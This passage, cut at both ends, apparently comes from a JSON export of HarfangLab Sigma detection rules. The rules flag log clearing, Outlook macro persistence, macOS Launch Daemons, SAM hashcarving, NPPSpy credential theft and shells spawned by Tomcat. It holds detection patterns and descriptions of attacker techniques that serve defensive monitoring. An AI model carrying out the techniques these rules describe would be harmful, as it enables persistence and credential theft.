'?:\\ProgramData\\Lenovo\\LenovoNow\\Downloads\\LenovoNow.Updater.exe'\n - ProcessAncestors|contains: '?:\\Program Files (x86)\\Lenovo\\LenovoNow\\unins???.exe'\n\n exclusion_ccleaner:\n - ProcessOriginalFileName: 'ccleaner.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Piriform Ltd'\n - ProcessDescription: 'CCleaner Service'\n ProcessSigned: 'true'\n ProcessSignature: 'Gen Digital Inc.'\n\n condition: selection and not ((all of filter_wevtutil_*) or (all of filter_ps_*) or (all of filter_wmic_*)) and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "43a740ac-2e54-4653-84a7-349b469a0a35",
"rule_name": "Windows Application Log Cleared",
"rule_description": "Detects when a Windows event log channel other than the Security log is cleared, based on event ID 104 written to the System log by the Microsoft-Windows-Eventlog provider (clearing the Security log generates event 1102 in the Security log instead); the event records the cleared channel and the clearing process.\nWindows Event Logs are the primary local record of system, security and application activity, and adversaries clear them to remove traces of an intrusion.\nClears performed through wevtutil, PowerShell Clear-EventLog/Remove-EventLog or wmic ClearEventLog are intentionally left to a dedicated rule, and a set of known cleaning, imaging and management tools is excluded.\nIt is recommended to identify the process and user responsible for the clearing and to look for suspicious activity on the host preceding it, since the cleared events are no longer available locally unless they were forwarded to a collector.\n",
"rule_creation_date": "2021-04-27",
"rule_modified_date": "2026-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1070.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "43ab3f91-4b1e-4b6c-b17b-6c7c6048fc09",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.626772Z",
"creation_date": "2026-03-23T11:45:34.626774Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.626778Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/malmoeb/status/1578678728242081792",
"https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/",
"https://attack.mitre.org/techniques/T1137/"
],
"name": "t1137_outlook_security_allowing_startup_persistence.yml",
"content": "title: Outlook Security Level Lowered allowing Startup Persistence\nid: 43ab3f91-4b1e-4b6c-b17b-6c7c6048fc09\ndescription: |\n Detects modification of the Outlook application security level.\n If this level is lowered to 1, it opens the path to a low privileged persistence mechanism through Outlook VBA startup scripts.\n It is recommended to determine if this is a wanted action by the system administrator or third party software, if so, it is recommended to whitelist the product or script responsible for the action.\n If it is part of a persistence attempt, it is recommended to isolate the machine and revert the configuration change.\nreferences:\n - https://twitter.com/malmoeb/status/1578678728242081792\n - https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/\n - https://attack.mitre.org/techniques/T1137/\ndate: 2022/10/10\nmodified: 2026/02/03\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1137\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.Exploitation\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKU\\S*\\SOFTWARE\\Microsoft\\Office\\\\*\\Outlook\\Security\\Level'\n Details: 'DWORD (0x00000001)'\n\n exclusion_ivanti:\n ProcessImage: '?:\\Program Files (x86)\\Ivanti\\Workspace Control\\pwrgrid.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Ivanti, Inc.'\n\n exclusion_setuphost:\n ProcessImage: '?:\\$WINDOWS.~BT\\Sources\\SetupHost.exe'\n\n exclusion_loadstate:\n ProcessOriginalFileName: 'LoadState.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n exclusion_office:\n ProcessOriginalFileName:\n - 'Outlook.exe'\n - 'WinWord.exe'\n - 'MSACCESS.EXE'\n - 'Excel.exe'\n - 'POWERPNT.EXE'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n condition: selection and not 
1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "43ab3f91-4b1e-4b6c-b17b-6c7c6048fc09",
"rule_name": "Outlook Security Level Lowered allowing Startup Persistence",
"rule_description": "Detects the Outlook macro security level (HKU\\...\\SOFTWARE\\Microsoft\\Office\\<version>\\Outlook\\Security\\Level) being set to 1, the value that enables all macros without notification.\nBecause this key lives in the user hive, a non-privileged user or malware running as that user can lower it; combined with a VbaProject.OTM file, this provides a low-privileged persistence mechanism in which Outlook executes attacker-controlled VBA at every startup.\nIt is recommended to determine whether the change was made deliberately by an administrator or by third-party software; if so, whitelist the product or script responsible for the action.\nIf it is part of a persistence attempt, isolate the machine, inspect the user's VbaProject.OTM, and revert the configuration change.\n",
"rule_creation_date": "2022-10-10",
"rule_modified_date": "2026-02-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1137"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "43dcad9d-1139-4d66-a5ee-93fb0336f1f9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.294868Z",
"creation_date": "2026-03-23T11:45:35.294892Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.294899Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1543/004/",
"https://attack.mitre.org/techniques/T1152/"
],
"name": "t1543_004_new_daemon_file.yml",
"content": "title: New Launch Daemon Added via Filesystem\nid: 43dcad9d-1139-4d66-a5ee-93fb0336f1f9\ndescription: |\n Detects a new Launch Daemon file being created.\n An attacker may create or modify Launch Daemons to execute malicious payloads as a way to establish persistent access.\n Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS.\n Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction.\n It is recommended to investigate the newly created Launch Daemon for malicious content.\nreferences:\n - https://attack.mitre.org/techniques/T1543/004/\n - https://attack.mitre.org/techniques/T1152/\ndate: 2023/07/11\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1543.004\n - attack.t1152\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Persistence\n - classification.macOS.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image:\n - '/bin/mv'\n - '/bin/cp'\n - '/usr/bin/rsync'\n CommandLine|contains:\n - ' /Library/LaunchDaemons/'\n # Also catch /Users//Library/LaunchAgents\n - ' /Library/LaunchAgents/'\n\n # This is handled by the rule a1ed8019-9b29-4699-9c30-056751959bd0\n filter_invisible_file:\n CommandLine|contains:\n - ' /Library/LaunchDaemons/.'\n - ' /Library/LaunchAgents/.'\n\n exclusion_jamf:\n ParentImage: '/Library/Application Support/JAMF/Remote Assist/jamfRemoteAssistLauncher'\n\n exclusion_glpi:\n CommandLine: 'cp -f org.glpi-project.glpi-agent.plist /library/launchdaemons/org.glpi-project.glpi-agent.plist'\n ParentCommandLine: 'sudo cp -f org.glpi-project.glpi-agent.plist /library/launchdaemons/org.glpi-project.glpi-agent.plist'\n\n exclusion_eset:\n CommandLine|startswith:\n - 'cp -f /Library/Application Support/ESET/Security/var/updated/plists/'\n - 'mv 
-f /Library/LaunchDaemons/*.plist /Library/Application Support/ESET/Security/var/updated/plists/*.plist'\n - 'mv -f /Library/LaunchAgents/*.plist /Library/Application Support/ESET/Security/var/updated/plists/*.plist'\n\n exclusion_microsoft:\n CommandLine:\n - '/bin/cp /library/application support/microsoft/mau2.0/microsoft autoupdate.app/contents/library/launchagents/com.microsoft.update.agent.plist /library/launchagents/'\n - '/bin/cp /library/application support/microsoft/mau2.0/microsoft autoupdate.app/contents/library/launchdaemons/com.microsoft.autoupdate.helper.plist /library/launchdaemons/'\n\n exclusion_zoom:\n CommandLine: 'cp -f us.zoom.zoomdaemon.plist /library/launchdaemons/us.zoom.zoomdaemon.plist'\n\n exclusion_installer:\n - ParentCommandLine|contains: ' /tmp/PKInstallSandbox.??????/'\n - GrandparentCommandLine|contains: ' /tmp/PKInstallSandbox.??????'\n\n exclusion_packagekit:\n GrandparentCommandLine: '/System/Library/PrivateFrameworks/PackageKit.framework/Versions/A/XPCServices/package_script_service.xpc/Contents/MacOS/package_script_service'\n\n exclusion_paceap:\n GrandparentCommandLine: '/Library/PrivilegedHelperTools/licenseDaemon.app/Contents/MacOS/licenseDaemon --backurl https://activation.paceap.com/InitiateActivation'\n\n exclusion_pearcleaner:\n GrandparentImage: '/Applications/Pearcleaner.app/Contents/MacOS/PearcleanerHelper'\n\n exclusion_trendmicro:\n ParentCommandLine: 'cp /Library/Application Support/com.trendmicro.endpointbasecamp/modules/ceta/CETAgent.app/Contents/Resources/com.trendmicro.cetagent.plist /Library/LaunchDaemons/com.trendmicro.cetagent.plist'\n\n exclusion_ea:\n GrandparentImage: '/Applications/EA app.app/Contents/Applications/EALaunchHelper.app/Contents/MacOS/EALaunchHelper'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "43dcad9d-1139-4d66-a5ee-93fb0336f1f9",
"rule_name": "New Launch Daemon Added via Filesystem",
"rule_description": "Detects a file being copied or moved (via cp, mv or rsync) into /Library/LaunchDaemons/ or into a Library/LaunchAgents/ directory, which also covers per-user ~/Library/LaunchAgents/ paths.\nAn attacker may create or modify Launch Daemons or Launch Agents to execute malicious payloads as a way to establish persistent access.\nLaunch Daemons and Launch Agents are defined by property list (plist) files that launchd, the macOS service management framework, loads to start and manage the described program.\nLaunch Daemons require elevated privileges to install, start at boot before any user logs in, and run in the background without user interaction; Launch Agents run in a user's session at login.\nPlists whose names start with a dot (hidden files) are handled by a separate rule, and known installers and software updaters are excluded.\nIt is recommended to investigate the newly created plist, the program it points to, and the process that placed it.\n",
"rule_creation_date": "2023-07-11",
"rule_modified_date": "2026-02-11",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1152",
"attack.t1543.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "43dff950-782f-403b-8b2b-8a2d3025027b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.083717Z",
"creation_date": "2026-03-23T11:45:34.083719Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.083723Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/rapid7/metasploit-framework/blob/2382d7530cf0cf2aa4ac63be30c98ca3fcdd6bbf/modules/post/windows/manage/hashcarve.rb",
"https://attack.mitre.org/techniques/T1078/"
],
"name": "t1003_004_metasploit_hashcarve.yml",
"content": "title: Possible Hashcarving in SAM Hive\nid: 43dff950-782f-403b-8b2b-8a2d3025027b\ndescription: |\n Detects the injection of a custom NTLM hash on a user account directly inside the SAM registry hive.\n This technique, known as hashcarving, can be used by attackers to create users without triggering detection related to normal Windows API user creation.\n It is recommended to investigate the processes and alerts surrounding this action to determine its legitimacy.\nreferences:\n - https://github.com/rapid7/metasploit-framework/blob/2382d7530cf0cf2aa4ac63be30c98ca3fcdd6bbf/modules/post/windows/manage/hashcarve.rb\n - https://attack.mitre.org/techniques/T1078/\ndate: 2020/11/06\nmodified: 2025/08/13\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.defense_evasion\n - attack.t1003.004\n - attack.t1112\n - attack.t1078\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject|contains: 'SAM\\SAM\\Domains\\Account\\'\n ProcessImage|contains: '?'\n\n filter_trusted:\n - ProcessImage:\n - '?:\\Windows\\system32\\lsass.exe'\n - '\\Device\\\\*\\Windows\\System32\\lsass.exe'\n - ProcessImage|endswith: '\\dismhost.exe'\n ProcessSigned: 'true'\n\n filter_empty:\n Details: '(Empty)'\n\n exclusion_jumpcloud:\n ProcessImage: '?:\\Program Files\\JumpCloud\\jumpcloud-agent.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'JumpCloud Inc'\n\n exclusion_cybereason:\n # HKLM\\SOFTWARE or HKLM\\$OFFLINE_RW_BCE441CA$SOFTWARE\\C\n - TargetObject: 'HKLM\\\\*SOFTWARE\\Cybereason\\ActiveProbe\\AuditBackup\\MACHINE\\SAM\\SAM\\Domains\\Account\\Users'\n Details: 'S:PAINO_ACCESS_CONTROL'\n - TargetObject: 'HKLM\\SOFTWARE\\Cybereason\\ActiveProbe\\AuditBackup\\MACHINE\\SAM\\SAM\\Domains\\Account\\Users'\n ProcessParentImage: '?:\\Program Files\\Cybereason ActiveProbe\\ActiveConsole\\ActiveConsole.exe'\n\n 
condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "43dff950-782f-403b-8b2b-8a2d3025027b",
"rule_name": "Possible Hashcarving in SAM Hive",
"rule_description": "Detects the injection of a custom NTLM hash on a user account directly inside the SAM registry hive.\nThis technique, known as hashcarving, can be used by attackers to create users without triggering detection related to normal Windows API user creation.\nIt is recommended to investigate the processes and alerts surrounding this action to determine its legitimacy.\n",
"rule_creation_date": "2020-11-06",
"rule_modified_date": "2025-08-13",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1003.004",
"attack.t1078",
"attack.t1112"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "440871d7-5765-49ca-9cab-da1ca38a5fb1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.085856Z",
"creation_date": "2026-03-23T11:45:34.085858Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.085862Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy",
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md#atomic-test-2---credential-dumping-with-nppspy",
"https://docs.microsoft.com/en-us/windows/win32/api/npapi/nf-npapi-nppasswordchangenotify",
"https://docs.microsoft.com/en-us/windows/win32/api/npapi/nf-npapi-nplogonnotify",
"https://attack.mitre.org/techniques/T1003/"
],
"name": "t1003_mpnotify_load_nppspy_dll.yml",
"content": "title: Credential Dumped via NPPSpy\nid: 440871d7-5765-49ca-9cab-da1ca38a5fb1\ndescription: |\n Detects when \"NPPSpy.dll\" is loaded by \"mpnotify.exe\".\n NPPSpy is used by attackers to receive notifications from \"winlogon.exe\" when a user logs in or changes password.\n With this, an attacker will get access to credentials in clear text.\n It is recommended to download and check the loaded DLL.\n It is also recommended to investigate how and when this DLL was created on the filesystem.\nreferences:\n - https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md#atomic-test-2---credential-dumping-with-nppspy\n - https://docs.microsoft.com/en-us/windows/win32/api/npapi/nf-npapi-nppasswordchangenotify\n - https://docs.microsoft.com/en-us/windows/win32/api/npapi/nf-npapi-nplogonnotify\n - https://attack.mitre.org/techniques/T1003/\ndate: 2021/08/26\nmodified: 2025/02/19\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003\n - attack.t1078\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.HackTool.NPPSpy\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n Image|endswith: '\\mpnotify.exe'\n ImageLoaded|endswith: '\\NPPSPY.dll'\n\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "440871d7-5765-49ca-9cab-da1ca38a5fb1",
"rule_name": "Credential Dumped via NPPSpy",
"rule_description": "Detects when \"NPPSpy.dll\" is loaded by \"mpnotify.exe\".\nNPPSpy is used by attackers to receive notifications from \"winlogon.exe\" when a user logs in or changes password.\nWith this, an attacker will get access to credentials in clear text.\nIt is recommended to download and check the loaded DLL.\nIt is also recommended to investigate how and when this DLL was created on the filesystem.\n",
"rule_creation_date": "2021-08-26",
"rule_modified_date": "2025-02-19",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003",
"attack.t1078"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "442d705c-9fa0-41d4-8e09-02c18684f5c3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.628131Z",
"creation_date": "2026-03-23T11:45:34.628133Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.628138Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://www.aquasec.com/blog/tomcat-under-attack-investigating-the-mirai-malware/",
"https://attack.mitre.org/techniques/T1203/",
"https://attack.mitre.org/techniques/T1505/003/"
],
"name": "t1203_tomcat_suspicious_shell.yml",
"content": "title: Suspicious Shell Executed by Tomcat\nid: 442d705c-9fa0-41d4-8e09-02c18684f5c3\ndescription: |\n Detects the execution of a suspicious shell by the Tomcat web server software likely related to a web shell or a command injection via a vulnerable application.\n Adversaries may backdoor web servers with web shells to establish persistent access to systems.\n It is recommended to verify the legitimacy of this command and check any other command executed by the Tomcat server.\nreferences:\n - https://www.aquasec.com/blog/tomcat-under-attack-investigating-the-mirai-malware/\n - https://attack.mitre.org/techniques/T1203/\n - https://attack.mitre.org/techniques/T1505/003/\ndate: 2021/09/17\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1203\n - attack.persistence\n - attack.t1505.003\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.Exploitation\n - classification.Linux.Behavior.InitialAccess\nlogsource:\n category: process_creation\n product: linux\ndetection:\n # TODO: Centos checking\n selection:\n # NOTE: Tomcat is executed via java and its main class is 'org.apache.catalina.startup.Bootstrap'\n ParentImage|endswith: 'java'\n ParentCommandLine|contains: 'org.apache.catalina.startup.Bootstrap'\n User:\n - 'root'\n - 'www-data'\n - 'tomcat'\n\n selection_image:\n Image|contains:\n - '/bin/'\n - '/sbin/'\n - '/tmp/'\n - '/dev/shm/'\n\n selection_command:\n CommandLine|contains: 'sh -c '\n\n # This is handled by the rule e021ad68-b12f-4190-b70f-e79e622e5860\n filter_t1203_tomcat_suspicious_command:\n - Image|endswith:\n - '/wget'\n - '/wget2' # https://discussion.fedoraproject.org/t/f40-change-proposal-wget2-as-wget/96422\n - '/curl'\n - '/cat'\n - '/crontab'\n - '/hostname'\n - '/ifconfig'\n - '/ip'\n - '/iptables'\n - '/ls'\n - '/netstat'\n - '/pwd'\n - '/route'\n - '/whoami'\n - '/w'\n - CommandLine|contains: 'sh -c uname'\n\n exclusion_java:\n # Exclude java childrens\n Image|endswith: 
'/java'\n\n exclusion_system_bin:\n Image|endswith:\n - '/dirname'\n - '/tty'\n - '/setfiles'\n - '/chkconfig'\n - '/getent'\n - '/getconf'\n - '/ldconfig'\n - '/lscpu'\n - '/systemctl'\n - '/su'\n - '/sudo'\n - '/dash'\n - '/bash'\n - '/id'\n - '/usr/bin/timeout'\n\n exclusion_image:\n Image|endswith:\n - '/libgvc6-config-update'\n - '/convert-im6.q16' # ImageMagick\n - '/magick'\n - '/soffice.bin'\n - '/libreoffice/program/.soffice.bin'\n - '/usr/local/bin/pdf2svg'\n - '/usr/bin/stream'\n - '/usr/bin/clamscan'\n - '/usr/bin/ffprobe'\n - '/opt/jalios/bin/pdf2svg/*/bin/pdf2svg'\n\n exclusion_ulimit:\n CommandLine: 'bash -c ulimit -u'\n\n exclusion_iparapheur:\n CommandLine: 'grep -E /opt/iParapheur/common'\n\n exclusion_iparapheur_pdf:\n Image|endswith:\n - '/iParapheur/common/lib/libriciel-pdf'\n - '/iParapheur/common/bin/.pdf2swf.bin'\n # /opt/iParapheur/common/lib/libriciel-pdf -t -f /opt/iParapheur/alf_data/contentstore/2022/1/4/9/46/4c434528-76e9-4e69-ac52-acb2afc1b0a8.bin\n # /opt/iParapheur/common/bin/.pdf2swf.bin -V\n CommandLine:\n - '*/iParapheur/common/lib/libriciel-pdf */iParapheur/alf_data/contentstore/*'\n - '*/iParapheur/common/lib/libriciel-pdf */iParapheur/tomcat/temp/*'\n - '*/iParapheur/common/bin/.pdf2swf.bin -V'\n\n exclusion_iparapheur_scripts:\n # /bin/sh /opt/iParapheur/common/bin/pdf2swf -V\n # /bin/sh /opt/iParapheur/common/bin/convert input output\n CommandLine:\n - '/bin/sh */iParapheur/common/bin/pdf2swf -V'\n - '/bin/sh */iParapheur/common/bin/convert*'\n\n exclusion_iparapheur_imagemagicks:\n # /opt/iParapheur/common/bin/.convert.bin input output\n - Image|endswith: '/iParapheur/common/bin/.convert.bin'\n - CommandLine: '/usr/bin/convert */iParapheur/tomcat/temp/Alfresco/ImageMagickContentTransformerWorker_init_source_* /iParapheur/tomcat/temp/Alfresco/ImageMagickContentTransformerWorker_init_target_*'\n\n # /opt/iParapheur/openoffice/program/soffice.bin --accept=socket,host=0,port=8100,tcpNoDelay=1;urp;StarOffice.ServiceManager 
-env:UserInstallation=file:///opt/iParapheur/alf_data/oouser --headless --nodefault --nofirststartwizard --nolockcheck --nologo --norestore --invisible\n exclusion_iparapheur_openoffice:\n Image|endswith: '/iParapheur/openoffice/program/soffice.bin'\n\n exclusion_iparapheur_convert:\n CommandLine|startswith: '/usr/bin/convert /opt/iParapheur/'\n\n exclusion_ldconfig:\n CommandLine:\n - '/sbin/ldconfig.real -p'\n - '/bin/sh /sbin/ldconfig -p'\n\n exclusion_alfresco_1:\n # /usr/bin/convert /opt/alfresco-4.2.8/tomcat/bin/../temp/Alfresco/ImageMagickContentTransformerWorker_source_5538363677025863519.pdf[0] -auto-orient -resize 100x150 /opt/alfresco-4.2.8/tomcat/bin/../temp/Alfresco/ImageMagickContentTransformerWorker_target_7368150091786604679.png\n CommandLine|contains|all:\n - '/usr/bin/convert '\n - 'alfresco'\n - 'ImageMagickContentTransformerWorker_source_'\n - 'ImageMagickContentTransformerWorker_target_'\n\n exclusion_alfresco_2:\n Image: '/opt/alfresco/alfresco-pdf-renderer/alfresco-pdf-renderer'\n\n exclusion_vadesecure_checkurl:\n # /opt/vadesecure/checkurl/vr2om-exploreurl.6.0\n Image:\n - '/opt/vadesecure/checkurl/vr2om-exploreurl.?.?'\n - '///opt/vadesecure/checkurl/vr2om-exploreurl.?.?'\n\n exclusion_alfresco_3:\n CommandLine:\n - '*/libreoffice/program/soffice.bin* -env:UserInstallation=file:///opt/tomcat/alfresco/*'\n - '/opt/libreoffice/program/soffice.bin *'\n - '/bin/ps -e -ww -o pid,args'\n\n exclusion_getent:\n CommandLine:\n - 'getent passwd'\n - 'getent group'\n\n exclusion_grangle:\n CommandLine:\n - 'rm -f /GRANGLE/appserver/tomcat/*/temp/null*.sh'\n - 'chmod --reference /GRANGLE/*'\n - '/GRANGLE/appserver/jdk/*/bin/keytool -importcert -file /GRANGLE/*'\n - 'chgrp * /GRANGLE/*/versions'\n - 'chown * /GRANGLE/*/versions'\n - '/GRANGLE/appserver/apache/*/bin/httpd -k graceful'\n - '/GRANGLE/appserver/apache/*/bin/httpd -k start'\n - '/GRANGLE/appserver/apache/*/bin/httpd -k stop'\n - 'chmod * /GRANGLE/*'\n - 'chown * /GRANGLE/*'\n - 'chgrp * 
/GRANGLE/*'\n - 'cp * /GRANGLE/* /GRANGLE/*'\n - 'ps -eaf'\n - 'ps -e -o uid,pid,cmd'\n ParentImage:\n - '/GRANGLE/appserver/jdk/*/bin/java'\n - '/appli/*/GRANGLE/appserver/jdk/*/bin/java'\n\n exclusion_sound_treatment:\n CommandLine|startswith:\n - 'sox '\n - 'lame '\n\n exclusion_sleep:\n CommandLine: 'sleep 1'\n\n exclusion_jalios:\n CommandLine|startswith: '/usr/bin/convert /opt/jalios'\n\n exclusion_converters:\n Image:\n - '/usr/bin/convert'\n - '/usr/bin/pdftotext'\n - '/usr/bin/pdftohtml'\n - '/usr/bin/wpd2text'\n\n exclusion_exiftool:\n CommandLine:\n - '/usr/bin/perl -w /bin/exiftool'\n - '/usr/bin/perl /bin/perldoc /bin/exiftool'\n\n exclusion_atempo_tina:\n CommandLine|startswith: '/tina/atempowebinterfaces/php/bin/'\n\n exclusion_amethis:\n ParentCommandLine|contains: '/amethis/server/java/bin/java'\n Image: '/usr/bin/kill'\n\n exclusion_mgr_libmod:\n Image: '/usr/bin/python3*'\n CommandLine: '/usr/bin/python3 /usr/bin/mgr-libmod'\n\n exclusion_jspawnhelper:\n # /data/ventes/bin/jdk17.0.3/lib/jspawnhelper\n Image|endswith: '/jspawnhelper'\n\n exclusion_p4:\n CommandLine:\n - '/usr/bin/p4 files *'\n - '/usr/bin/p4 dirs *'\n\n exclusion_git:\n CommandLine: '/usr/bin/git --version'\n\n exclusion_ps:\n CommandLine:\n - '/bin/ps -e -o pid,args'\n - 'ps * --noheader'\n - 'ps -fT -U *'\n\n exclusion_jmap:\n Image|endswith: '/jdk*/bin/jmap'\n\n condition: selection and 1 of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "442d705c-9fa0-41d4-8e09-02c18684f5c3",
"rule_name": "Suspicious Shell Executed by Tomcat",
